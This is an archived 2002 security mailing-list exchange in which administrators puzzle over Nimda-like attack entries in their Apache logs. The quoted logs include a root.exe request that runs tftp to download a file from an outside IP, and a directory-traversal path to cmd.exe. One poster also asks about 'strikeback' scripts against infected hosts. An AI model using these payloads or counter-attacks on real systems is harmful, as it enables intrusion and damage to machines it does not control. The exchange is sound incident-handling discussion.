Re: Wave of Nimda-like hits this morning?

From: Erick Brockway (ebrockway@earthlink.net)
Date: 02/27/02 

From: "Erick Brockway" <ebrockway@earthlink.net>
To: "Ralph Los" <RLos@enteredge.com>, <incidents@securityfocus.com>
Date: Tue, 26 Feb 2002 18:57:48 -0800

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

    Ok, this has been driving me nuts. Found these line in my Apache
 logs lately;
4.41.54.56 - - [23/Feb/2002:08:26:20 -0800] "GET
/scripts/root.exe?/c+tftp%20-i%204.41.54.56%20GET%20Admin.dll%20Admin.
dll HTTP/1.0" 200 2701
4.41.54.56 - - [23/Feb/2002:08:26:22 -0800] "GET /scripts/Admin.dll
HTTP/1.0" 404 295

    Seemingly pointing at a specific IP. Several times now I've seen
this IP and others, as well as the usual bunk nimda lines. What the
heck is it, and does it in fact point to a collection point?
    Also, what is the opinion of running IIS shutdown perl scripts?
The so-called Strikeback Script? On the one hand, it seems it might
get the attention of the owner of the hacked IIS system, on the
other...some unsaved info could be lost on the IIS machine, assuming
the script even works.
    I'm currently searching for a Notification Script, of the type
mentioned elsewhere in this thread, if anyone has it on an FTP.

- ----- Original Message -----
From: "Ralph Los" <RLos@enteredge.com>
To: <incidents@securityfocus.com>
Sent: Tuesday, February 26, 2002 6:46 AM
Subject: Wave of Nimda-like hits this morning?

Hey,
I've had multiple clients' Solaris boxes crashing this morning from
what appears to be a Nimda-like 'scripts/..%5c../root.exe', and the
usual.
The same old unicode characters are present [%2f, %5c] but a new one
has
appeared I haven't seen yet. This line:

'
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.e
xe '

appears a few times and I'm not quite sure what to make of it...

Please keep in mind that came from a Solaris box, Apache log.
Whatever this (maybe) new bug is, it's blowing up these boxes left
and
right...can't figure it out. They're all relatively new 1.3'ish
versions I
think.

Anyone else seeing anything weird?

- ----------------------------------------|
Ralph M. Los
Sr. Security Consultant and Trainer
          EnterEdge Technology, L.L.C.
          rlos@enteredge.com
          (770) 955-9899 x.206
- ----------------------------------------|

- ----------------------------------------------------------------------
- ------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBPHxLFJkmeTuuwg2cEQIIIgCguagWRT3ygBo/MU8KfmSZX+BKcKgAoOEZ
9jl40lkEIIE90s1XNVBy0LSR
=5Dgf
-----END PGP SIGNATURE-----

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

Relevant Pages

  • Re: Secured IIS Project - IIS 4.0 Secure Script
    ... Secured IIS Project - IIS 4.0 Secure Script ... Machines which were upgraded from IIS 2.0 (original NT installation), ... Remove FTP Service ...
    (NT-Bugtraq)
  • Re: INETINFO and ASP Trouble
    ... seeing many IIS and ASP errors in the event log, ... > Event Type: Error ... > Event Source: Service Control Manager ... IIS log failed to write entry, Script timed out. ...
    (microsoft.public.inetserver.iis)
  • Re: IIS 4.0 DOS attack?
    ... Subject: IIS 4.0 DOS attack? ... patch distribution script we use (exploded hotfixes applied through ... a lot of our servers were fine -- we just ...
    (Focus-Microsoft)
  • Re: Webservice to an Out of process server
    ... I've create a COM server in VFP which I try to access from a Webservice ... If you want to run executables on IIS from a script (i.e. an ASP, ASP.Net, ... well as Web Service Extension for the appropriate Script Engine. ...
    (microsoft.public.inetserver.iis.security)
  • RE: Hacked NT/2K box
    ... it does effect IIS 4 and IIS 5. ... Windows 2000 IIS 5.0 IPP ISAPI 'Host:' Buffer Overflow Vulnerability"). ... > Looking through the script you posted, ... > it's able to obtain a remote shell from a Unix system. ...
    (Focus-Microsoft)